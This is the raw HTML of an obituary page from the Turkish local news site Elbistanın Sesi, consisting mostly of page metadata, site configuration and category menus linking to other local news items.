  <!DOCTYPE html>
<html lang="tr" class="sayfa-haber hs-rush no-inlinesvg site-center" itemscope itemtype="http://schema.org/NewsArticle">
  <head>
    <title>Döndü Üzüm 87 yaşında</title>
<meta charset="utf-8">
<!--meta name="viewport" content="width=device-width, initial-scale=1.0"-->
<meta name="description" content="" />
<meta name="keywords" content="Döndü Üzüm 87 yaşında" />
<meta name="news_keywords" content="Döndü Üzüm 87 yaşında">
<meta name="author" content="Elbistanın Sesi" /><meta property="og:site_name" content="Elbistanın Sesi" />
<meta property="og:title" content="Döndü Üzüm 87 yaşında" />
<meta property="og:description" content="" />
  <meta property="og:image" content="https://www.elbistaninsesi.com/images/haberler/2022/03/dondu_uzum_87_yasinda_h73200_0a0f6.jpg" />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://www.elbistaninsesi.com/vefatlar/dondu-uzum-87-yasinda-h73200.html" /><meta http-equiv="refresh" content="3000" /><meta name="twitter:card" content="summary_large_image" />
<meta property="og:title" content="Döndü Üzüm 87 yaşında" />
<meta name="twitter:url" content="http://www.elbistaninsesi.com/vefatlar/dondu-uzum-87-yasinda-h73200.html" />
<meta name="twitter:domain" content="https://www.elbistaninsesi.com/" />
<meta name="twitter:site" content="elbistaninsesi" />
<meta name="twitter:title" content="Döndü Üzüm 87 yaşında" />
<meta name="twitter:description" content="" />
<meta name="twitter:image:src" content="https://www.elbistaninsesi.com/images/haberler/2022/03/dondu_uzum_87_yasinda_h73200_0a0f6.jpg" /><link rel="alternate" href="https://www.elbistaninsesi.com/vefatlar/dondu-uzum-87-yasinda-h73200.html" hreflang="tr" />

<link href='https://fonts.googleapis.com/css?family=Oswald&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'>
<link href='https://fonts.googleapis.com/css?family=Roboto:400,400italic,500,500italic,700&amp;subset=latin,latin-ext' rel='stylesheet' type='text/css'>
<link href="https://www.elbistaninsesi.com/_themes/hs-rush-php/style/compress.css" rel="stylesheet"/>
<link href="https://www.elbistaninsesi.com/_themes/hs-rush-php/style/renk.css" rel="stylesheet"/><link href="https://www.elbistaninsesi.com/_themes/hs-rush-php/style/print.css" rel="stylesheet" media="print"/>
<link rel="alternate" type="application/rss+xml" title="RSS servisi" href="https://www.elbistaninsesi.com/rss.php" />
<link itemprop="mainEntityOfPage" rel="canonical" href="https://www.elbistaninsesi.com/vefatlar/dondu-uzum-87-yasinda-h73200.html">
<link rel="amphtml" href="https://www.elbistaninsesi.com/amp/vefatlar/dondu-uzum-87-yasinda-h73200.html">
  <link rel="image_src" type="image/jpeg" href="https://www.elbistaninsesi.com/images/haberler/2022/03/dondu_uzum_87_yasinda_h73200_0a0f6.jpg" />
<meta property="og:image:width" content="768"/>
<meta property="og:image:height" content="432"/>
<meta itemprop="headline" content="Döndü Üzüm 87 yaşında" />
<meta itemprop="thumbnailUrl" content="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/03/dondu_uzum_87_yasinda_h73200_0a0f6.jpg" />
<meta itemprop="articleSection" content="Vefatlar" name="section" />
<meta itemprop="dateCreated" content="2022-03-19T12:20:16+02:00" />
<meta itemprop="image" content="https://www.elbistaninsesi.com/images/haberler/2022/03/dondu_uzum_87_yasinda_h73200_0a0f6.jpg" />
<meta itemprop="genre" content="news" name="medium" />
<meta itemprop="inLanguage" content="tr-TR" />
<meta itemprop="keywords" content="Döndü Üzüm 87 yaşında" name="keywords" />




<!--[if gte IE 9]>
<style type="text/css">.gradient {filter: none;}</style>
<![endif]-->
<!--[if IE 7]>
<style type="text/css">.reklam.dikey.sol .fixed{margin-left:-px;}</style>
<![endif]-->

<script type="text/javascript">
var site_url = 'https://www.elbistaninsesi.com/',
tema = 'hs-rush-php',
surum = '1.6.5',
sistem = '5.11',
theme_path = 'https://www.elbistaninsesi.com/_themes/hs-rush-php/',
ajax_url = '_ajax/',
cat_limit = '10',
headerayar = 'header_genis',
poll_voted = '',
comment_approved = '',
lazyload = '0',
twitter_user  = 'elbistaninsesi',
facebook_user = 'elbistaninsesi',
popup_saat = '1',
yorum_harf_ayar = '1',
iftara_kalan_sure = '0',
namaz_default = 'kahramanmaras',
uye_gir = 'Üye Girişi',
uye_ol = 'Üye Ol',
cikis_yap = 'Çıkış Yap',
baglan_fb = 'Facebook ile Bağlan',
analitik_ga = 'UA-21655627-1';
</script>

<style>
.dikeyhaberler .haber {
    width: 197px;
}
.dikeyhaberler .haber img {
    width: 200px;
    height: 120px;
}
.row-fluid [class*="span"]:first-child {
    margin-left: 0;
}
.dikeyhaberler .haber:last-child {
    margin-left: 15px;
}
#syazar {
    background-color: #EFEEEE;
}
</style>    <!--[if lt IE 9]>
      <script src="http://html5shim.googlecode.com/svn/trunk/html5.js"></script>
    <![endif]-->
      </head>
  <body class="hs-lch">

    
        
    
        
        <!-- HEADER -->
    <div id="siteHeader" class="header clearfix">
      <div id="header-top" class="header-top hs-bgc clearfix">
  <div class="header-top-container">

    
    

    <div class="header-top-block header-top-cycle">
            <div class="header-top-currency">
        <div class="currency-cycle">
          <div class="hs-bgc currency-dolar glyphicons white usd">DOLAR <span class="currency-rate">14,79</span></div>
          <div class="hs-bgc currency-euro glyphicons white euro">EURO <span class="currency-rate">16,39</span></div>
          <div class="hs-bgc currency-altin glyphicons white coins">ALTIN <span class="currency-rate">913,93</span></div>
          <div class="hs-bgc currency-bist glyphicons white global">BIST <span class="currency-rate">2.144,26</span></div>
        </div>
      </div>
      
      <div class="header-top-hot mleft">
        <div class="hot-cycle">
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/maden-isten-is-sagligi-guvenligi-icin-ozel-proje-h73201.html" title="Maden-İş’ten ‘İş Sağlığı Güvenliği’ için özel proje" >Maden-İş’ten ‘İş Sağlığı Güvenliği’ için özel proje</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/devlet-hastanesinde-ilk-kez-el-bileginden-koroner-anjiyografi-yapildi-h73199.html" title="Devlet hastanesinde ilk kez el bileğinden koroner anjiyografi yapıldı" >Devlet hastanesinde ilk kez el bileğinden koroner anjiyografi yapıldı</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/jasat-ve-jandarmadan-hirsizlik-sebekesine-darbe-h73198.html" title="JASAT ve jandarmadan hırsızlık şebekesine darbe" >JASAT ve jandarmadan hırsızlık şebekesine darbe</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/canakkale-ruhunu-hem-yasadilar-hem-yasattilar-h73197.html" title="Çanakkale ruhunu hem yaşadılar hem yaşattılar" >Çanakkale ruhunu hem yaşadılar hem yaşattılar</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/sehit-aileleri-ve-gazilere-devlet-ovunc-madalyalari-takdim-edildi-2-h73196.html" title="Şehit Aileleri ve Gazilere Devlet Övünç Madalyaları Takdim Edildi" >Şehit Aileleri ve Gazilere Devlet Övünç Madalyaları Takdim Edildi</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/ekinozunde-18-tasinmaz-ihale-ile-satilacak-h73195.html" title="Ekinözü’nde 18 taşınmaz ihale ile satılacak" >Ekinözü’nde 18 taşınmaz ihale ile satılacak</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/denetimli-serbestlikten-2-ayri-etkinlik-h73194.html" title="Denetimli Serbestlik’ten 2 ayrı etkinlik" >Denetimli Serbestlik’ten 2 ayrı etkinlik</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/mehmetcigin-canakkaledeki-bir-ogunu-kumanyalari-oldu-h73193.html" title="Mehmetçiğin Çanakkale’deki bir öğünü, kumanyaları oldu" >Mehmetçiğin Çanakkale’deki bir öğünü, kumanyaları oldu</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/4-otomobil-carpisti-2-yarali-h73192.html" title="4 otomobil çarpıştı: 2 yaralı" >4 otomobil çarpıştı: 2 yaralı</a>
                </div>
                            <div class="hs-bgc">
                  <a class="glyphicons white history hs-sdch rotateIn" href="https://www.elbistaninsesi.com/guncel/ali-tekinsoy-ortaokulu-enerjisini-gunesten-alacak-h73190.html" title="Ali Tekinsoy Ortaokulu enerjisini güneşten alacak" >Ali Tekinsoy Ortaokulu enerjisini güneşten alacak</a>
                </div>
                    </div>
      </div>
    </div>

    <div class="header-top-block header-top-right">
      <div class="header-top-user">

              <div class="btn-group">
                <button class="btn btn-user hs-bgco dropdown-toggle glyphicons white keys" data-toggle="dropdown"></button>
                <ul id="memberArea" class="dropdown-menu hs-bgcd">
                </ul>
              </div>

      </div>
    </div>

      <div id="sb-search" class="header-top-block header-top-search sb-search">
            <form action="https://www.elbistaninsesi.com/" method="get">
              <input type="hidden" name="m" value="arama">


                            

              <input class="sb-search-input hs-bgcd" placeholder="Haber Ara ..." type="search" name="q" id="search">
              <input type="hidden" name="auth" value="cad4d01fe21ea6feed3314a1b4e230b6be230f4e" />
              <input class="sb-search-submit" type="submit" value="">
              <span class="sb-icon-search hs-bgc"></span>
            </form>
          </div>
  </div>
</div>
      <div id="logo" class="container">
  <div class="row">
        <div class="span3">
              <span class="logo"><a href="https://www.elbistaninsesi.com/" class="logo"><img src="https://www.elbistaninsesi.com/images/banner/Ysimsiz-1_2.jpg" alt="Döndü Üzüm 87 yaşında" /></a></span>
          </div>
    <div class="span9">
          </div>
      </div>
</div>

<div id="menu" class="clearfix">

  <div class="kategori">
    <div class="container">
      <a href="https://www.elbistaninsesi.com/" class="glyphicons home"></a>

      
      
            <a href="https://www.elbistaninsesi.com/yazarlar/" class="glyphicons parents">Yazarlar</a>
      
      

      
              <a title="Vefatlar" href="https://www.elbistaninsesi.com/vefatlar" id="k7" class="current"   >Vefatlar</a>
<a title="Güncel" href="https://www.elbistaninsesi.com/guncel" id="k8"    >Güncel</a>
<a title="Politika" href="https://www.elbistaninsesi.com/politika" id="k2"    >Politika</a>
<a title="Sağlık" href="https://www.elbistaninsesi.com/saglik" id="k4"    >Sağlık</a>
<a title="Eğitim / Kültür" href="https://www.elbistaninsesi.com/egitim-kultur" id="k5"    >Eğitim / Kültür</a>
<a title="Spor" href="https://www.elbistaninsesi.com/spor" id="k1"    >Spor</a>
<a title="Ekonomi" href="https://www.elbistaninsesi.com/ekonomi" id="k3"    >Ekonomi</a>
<a title="Arşiv Özel" href="https://www.elbistaninsesi.com/arsiv-ozel" id="k9"    >Arşiv Özel</a>
<a title="Seçim Sonucu" href="https://www.elbistaninsesi.com/secim-sonucu" id="k13"    >Seçim Sonucu</a>
<a title="YEREL" href="https://www.elbistaninsesi.com/yerel" id="k17"    >YEREL</a>
<div class="other pull-right"><a href="#" class="all glyphicons show_lines" title="Diğer Kategoriler"></a></div>      
      
      
    </div>
  </div>

  <div class="othercat right">
    <div class="container center">
              <a title="ASAYİŞ" href="https://www.elbistaninsesi.com/asayis" id="k19"    >ASAYİŞ</a>
<a title="KÜLTÜR-SANAT" href="https://www.elbistaninsesi.com/kultur-sanat" id="k20"    >KÜLTÜR-SANAT</a>
<a title="GENEL" href="https://www.elbistaninsesi.com/genel" id="k21"    >GENEL</a>
<a title="DÜNYA" href="https://www.elbistaninsesi.com/dunya" id="k22"    >DÜNYA</a>
<a title="EĞİTİM" href="https://www.elbistaninsesi.com/egitim" id="k48"    >EĞİTİM</a>
<a title="ÇEVRE" href="https://www.elbistaninsesi.com/cevre" id="k53"    >ÇEVRE</a>
<a title="MAGAZİN" href="https://www.elbistaninsesi.com/magazin" id="k60"    >MAGAZİN</a>
<a title="HABERDE İNSAN" href="https://www.elbistaninsesi.com/haberde-insan" id="k71"    >HABERDE İNSAN</a>
          </div>
  </div>

  
  <div id="katicerik" class="row-fluid">
    <div class="container"><div class="katelement kat_k7">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/vefatlar/dondu-uzum-87-yasinda-h73200.html" title="Döndü Üzüm 87 yaşında"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/03/dondu_uzum_87_yasinda_h73200_0a0f6.jpg" alt="Döndü Üzüm 87 yaşında" />
Döndü Üzüm 87 yaşında</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/vefatlar/mustafa-atasayar-70-yasinda-h73191.html" title="Mustafa Atasayar 70 Yaşında"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/03/mustafa_atasayar_70_yasinda_h73191_9c831.jpg" alt="Mustafa Atasayar 70 Yaşında" />
Mustafa Atasayar 70 Yaşında</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/vefatlar/mediha-ozesmer-85-yasinda-h73173.html" title="Mediha Özesmer 85 yaşında"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/03/mediha_ozesmer_85_yasinda_h73173_219a4.jpg" alt="Mediha Özesmer 85 yaşında" />
Mediha Özesmer 85 yaşında</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/vefatlar/mehmet-ceren-h73172.html" title="Mehmet Ceren"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/03/mehmet_ceren_h73172_31500.jpg" alt="Mehmet Ceren" />
Mehmet Ceren</a>
</div>
</div></div><div class="katelement kat_k8">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/guncel/maden-isten-is-sagligi-guvenligi-icin-ozel-proje-h73201.html" title="Maden-İş’ten ‘İş Sağlığı Güvenliği’ için özel proje"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/03/maden_isten_is_sagligi_guvenligi_icin_ozel_proje_h73201_d3f44.JPG" alt="Maden-İş’ten ‘İş Sağlığı Güvenliği’ için özel proje" />
Maden-İş’ten ‘İş Sağlığı Güvenliği’ için özel proje</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/guncel/devlet-hastanesinde-ilk-kez-el-bileginden-koroner-anjiyografi-yapildi-h73199.html" title="Devlet hastanesinde ilk kez el bileğinden koroner anjiyografi yapıldı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/03/devlet_hastanesinde_ilk_kez_el_bileginden_koroner_anjiyografi_yapildi_h73199_cbb41.jpg" alt="Devlet hastanesinde ilk kez el bileğinden koroner anjiyografi yapıldı" />
Devlet hastanesinde ilk kez el bileğinden koroner anjiyografi yapıldı</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/guncel/jasat-ve-jandarmadan-hirsizlik-sebekesine-darbe-h73198.html" title="JASAT ve jandarmadan hırsızlık şebekesine darbe"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/03/jasat_ve_jandarmadan_hirsizlik_sebekesine_darbe_h73198_6acf2.jpg" alt="JASAT ve jandarmadan hırsızlık şebekesine darbe" />
JASAT ve jandarmadan hırsızlık şebekesine darbe</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/guncel/canakkale-ruhunu-hem-yasadilar-hem-yasattilar-h73197.html" title="Çanakkale ruhunu hem yaşadılar hem yaşattılar"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2022/03/canakkale_ruhunu_hem_yasadilar_hem_yasattilar_h73197_90eab.JPG" alt="Çanakkale ruhunu hem yaşadılar hem yaşattılar" />
Çanakkale ruhunu hem yaşadılar hem yaşattılar</a>
</div>
</div></div><div class="katelement kat_k2">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/politika/iyi-partide-mevcut-baskan-huseyin-gul-guven-tazeledi-h66989.html" title="İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2020/06/iyi_partide_mevcut_baskan_huseyin_gul_guven_tazeledi_h66989_4ef72.JPG" alt="İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi" />
İYİ Parti’de mevcut Başkan Hüseyin Gül, güven tazeledi</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/politika/ak-parti-ilce-baskan-adayi-tirastan-aciklama-h66803.html" title="AK Parti İlçe Başkan Adayı Tıraş’tan açıklama"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2020/05/ak_parti_ilce_baskan_adayi_tirastan_aciklama_h66803_4a4d1.jpg" alt="AK Parti İlçe Başkan Adayı Tıraş’tan açıklama" />
AK Parti İlçe Başkan Adayı Tıraş’tan açıklama</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/politika/baskan-sungur-kongrede-yeniden-aday-olmayacagini-acikladi-h65800.html" title="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/baskan_sungur_kongrede_yeniden_aday_olmayacagini_acikladi_h65800_70585.jpeg" alt="Başkan Sungur kongrede yeniden aday olmayacağını açıkladı" />
Başkan Sungur kongrede yeniden aday olmayacağını açıkladı</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/politika/mhp-meclis-uyelerinden-birlik-ve-beraberlik-iftari-h63165.html" title="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/mhp_meclis_uyelerinden_birlik_ve_beraberlik_iftari_h63165_540b4.JPG" alt="MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı" />
MHP Meclis Üyeleri’nden birlik ve beraberlik iftarı</a>
</div>
</div></div><div class="katelement kat_k4">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/saglik/crown-dental-hasta-kabulune-basladi-h63790.html" title="Crown Dental hasta kabulüne başladı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/crown_dental_hasta_kabulune_basladi_h63790_f7c46.JPG" alt="Crown Dental hasta kabulüne başladı" />
Crown Dental hasta kabulüne başladı</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/saglik/uzman-dr-erdinc-hatipsoylu-hasta-kabulune-basladi-h63781.html" title="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/08/uzman_dr_erdinc_hatipsoylu_hasta_kabulune_basladi_h63781_4e39a.JPG" alt="Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı" />
Uzman Dr. Erdinç Hatipsoylu hasta kabulüne başladı</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/saglik/elbistanda-saglik-kadrosu-guclenmeye-devam-ediyor-h63436.html" title="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/elbistanda_saglik_kadrosu_guclenmeye_devam_ediyor_h63436_480cd.JPG" alt="Elbistan’da sağlık kadrosu güçlenmeye devam ediyor" />
Elbistan’da sağlık kadrosu güçlenmeye devam ediyor</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/saglik/edh-obezite-cerrahisinde-soz-sahibi-olmaya-basladi-h63423.html" title="EDH, obezite cerrahisinde söz sahibi olmaya başladı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/edh_obezite_cerrahisinde_soz_sahibi_olmaya_basladi_h63423_4b617.JPG" alt="EDH, obezite cerrahisinde söz sahibi olmaya başladı" />
EDH, obezite cerrahisinde söz sahibi olmaya başladı</a>
</div>
</div></div><div class="katelement kat_k5">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/egitim-kultur/maras-savunmasi-belgeselinin-elbistan-bolumu-cekiliyor-h63426.html" title="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/06/maras_savunmasi_belgeselinin_elbistan_bolumu_cekiliyor_h63426_dfbd4.JPG" alt="Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor" />
Maraş Savunması Belgeseli’nin Elbistan bölümü çekiliyor</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/egitim-kultur/otizmli-cocuklar-icin-ozel-etkinlik-h62473.html" title="Otizmli çocuklar için özel etkinlik"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/04/otizmli_cocuklar_icin_ozel_etkinlik_h62473_6209c.jpg" alt="Otizmli çocuklar için özel etkinlik" />
Otizmli çocuklar için özel etkinlik</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/egitim-kultur/kadinlara-yonelik-elde-maras-isi-el-nakiscisi-kursu-aciliyor-h61759.html" title="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/kadinlara_yonelik_elde_maras_isi_el_nakiscisi_kursu_aciliyor_h61759_488fe.jpg" alt="Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor" />
Kadınlara yönelik elde Maraş işi-el nakışçısı kursu açılıyor</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/egitim-kultur/nurhak-kaymakamligindan-egitime-ozel-destek-h61699.html" title="Nurhak Kaymakamlığı’ndan eğitime özel destek"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/no_headline.jpg" alt="Nurhak Kaymakamlığı’ndan eğitime özel destek" />
Nurhak Kaymakamlığı’ndan eğitime özel destek</a>
</div>
</div></div><div class="katelement kat_k1">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/spor/elbistanspor-kadin-voleybol-takimi-ankaradan-puansiz-dondu-h65794.html" title="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2020/02/elbistanspor_kadin_voleybol_takimi_ankaradan_puansiz_dondu_h65794_499a5.jpg" alt="Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü" />
Elbistanspor Kadın Voleybol Takımı, Ankara’dan puansız döndü</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/spor/filenin-sultanlari-nevsehiri-agirlayacak-h65558.html" title="Filenin sultanları, Nevşehir’i ağırlayacak"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/filenin_sultanlari_nevsehiri_agirlayacak_h65558_a6a90.jpg" alt="Filenin sultanları, Nevşehir’i ağırlayacak" />
Filenin sultanları, Nevşehir’i ağırlayacak</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/spor/ptt-sporu-3-1-yenen-filenin-sultanlari-moral-buldu-h65460.html" title="PTT Spor’u 3-1 yenen filenin sultanları moral buldu"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2020/01/ptt_sporu_3_1_yenen_filenin_sultanlari_moral_buldu_h65460_2da74.jpg" alt="PTT Spor’u 3-1 yenen filenin sultanları moral buldu" />
PTT Spor’u 3-1 yenen filenin sultanları moral buldu</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/spor/elbistan-in-sultanlari-ndan-onemli-galibiyet-h65021.html" title="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/12/elbistan_in_sultanlari_dan_onemli_galibiyet_h65021_ff6ef.jpg" alt="Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet" />
Elbistan&#039;ın Sultanları&#039;ndan önemli galibiyet</a>
</div>
</div></div><div class="katelement kat_k3">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/ekonomi/mikrokredi-destegi-koronavirus-doneminde-de-devam-ediyor-h67098.html" title="Mikrokredi desteği koronavirüs döneminde de devam ediyor"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2020/07/mikrokredi_destegi_koronavirus_doneminde_de_devam_ediyor_h67098_5fc86.jpg" alt="Mikrokredi desteği koronavirüs döneminde de devam ediyor" />
Mikrokredi desteği koronavirüs döneminde de devam ediyor</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/ekonomi/baris-pinari-harekatinda-teror-orgutune-buyuk-darbe-h64435.html" title="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/baris_pinari_harekatinda_teror_orgutune_buyuk_darbe_h64435_aec94.jpg" alt="Barış Pınarı Harekatı’nda terör örgütüne büyük darbe" />
Barış Pınarı Harekatı’nda terör örgütüne büyük darbe</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/ekonomi/etso-ve-teb-kredi-protokolu-imzaladi-h61756.html" title="ETSO ve TEB kredi protokolü imzaladı"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/etso_ve_teb_kredi_protokolu_imzaladi_h61756_7542a.jpg" alt="ETSO ve TEB kredi protokolü imzaladı" />
ETSO ve TEB kredi protokolü imzaladı</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/ekonomi/dogakadan-ekinozu-ve-nurhaktaki-yatirimlara-destek-h61675.html" title="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2019/01/dogakadan_ekinozu_ve_nurhaktaki_yatirimlara_destek_h61675_c61db.jpg" alt="DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek" />
DOĞAKA’dan Ekinözü ve Nurhak’taki yatırımlara destek</a>
</div>
</div></div><div class="katelement kat_k9">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/arsiv-ozel/17-ekim-1968-pazartesi-h3006.html" title="17 EKİM 1968 PAZARTESİ"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/24401.jpg" alt="17 EKİM 1968 PAZARTESİ" />
17 EKİM 1968 PAZARTESİ</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/arsiv-ozel/13-ekim-1968-persembe-h3005.html" title="13 EKİM 1968 PERŞEMBE"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/24398.jpg" alt="13 EKİM 1968 PERŞEMBE" />
13 EKİM 1968 PERŞEMBE</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/arsiv-ozel/17-agustos-1967-persembe-h2896.html" title="17 AĞUSTOS 1967 PERŞEMBE"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/24181.jpg" alt="17 AĞUSTOS 1967 PERŞEMBE" />
17 AĞUSTOS 1967 PERŞEMBE</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/arsiv-ozel/30-mayis-1959-cumartesi-h2893.html" title="30 MAYIS 1959 CUMARTESİ"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/24174.jpg" alt="30 MAYIS 1959 CUMARTESİ" />
30 MAYIS 1959 CUMARTESİ</a>
</div>
</div></div><div class="katelement kat_k13">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/secim-sonucu/16-nisan-2017-anayasa-degisikligi-referandumu-h39059.html" title="16 Nisan 2017 Anayasa Değişikliği Referandumu"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/16_nisan_2017_anayasa_degisikligi_referandumu_h39059_39ce8.jpg" alt="16 Nisan 2017 Anayasa Değişikliği Referandumu" />
16 Nisan 2017 Anayasa Değişikliği Referandumu</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/secim-sonucu/1-kasim-2015-26-donem-milletvekili-genel-secimi-h39058.html" title="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/1_kasim_2015_26_donem_milletvekili_genel_secimi_h39058_aa012.jpg" alt="1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi" />
1 Kasım 2015 26. Dönem Milletvekili Genel Seçimi</a>
</div>
</div><div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/secim-sonucu/7-haziran-2015-25-donem-milletvekili-genel-secimi-h30737.html" title="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2015-Genel-Secim-Sonuclari_297.jpg" alt="7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi" />
7 Haziran 2015 25. Dönem Milletvekili Genel Seçimi</a>
</div>
</div><div class="kathab"></div></div><div class="katelement kat_k17">
<div class="kathab"><div>
<a href="https://www.elbistaninsesi.com/kahramanmaras/kmtso-baskani-zabun-ktm-tekstil-ve-moda-yolculuguna-yeni-bir-ivme-kazandiracak-h38463.html" title="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”"><img src="https://www.elbistaninsesi.com/images/haberler/thumbs/2017/04/kmtso_baskani_zabun_ktm_tekstil_ve_moda_yolculuguna_yeni_bir_ivme_kazandiracak.jpg" alt="KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”" />
KMTSO Başkanı Zabun; “KTM, tekstil ve moda yolculuğuna yeni bir ivme kazandıracak”</a>
</div>
</div><div class="kathab"><div>
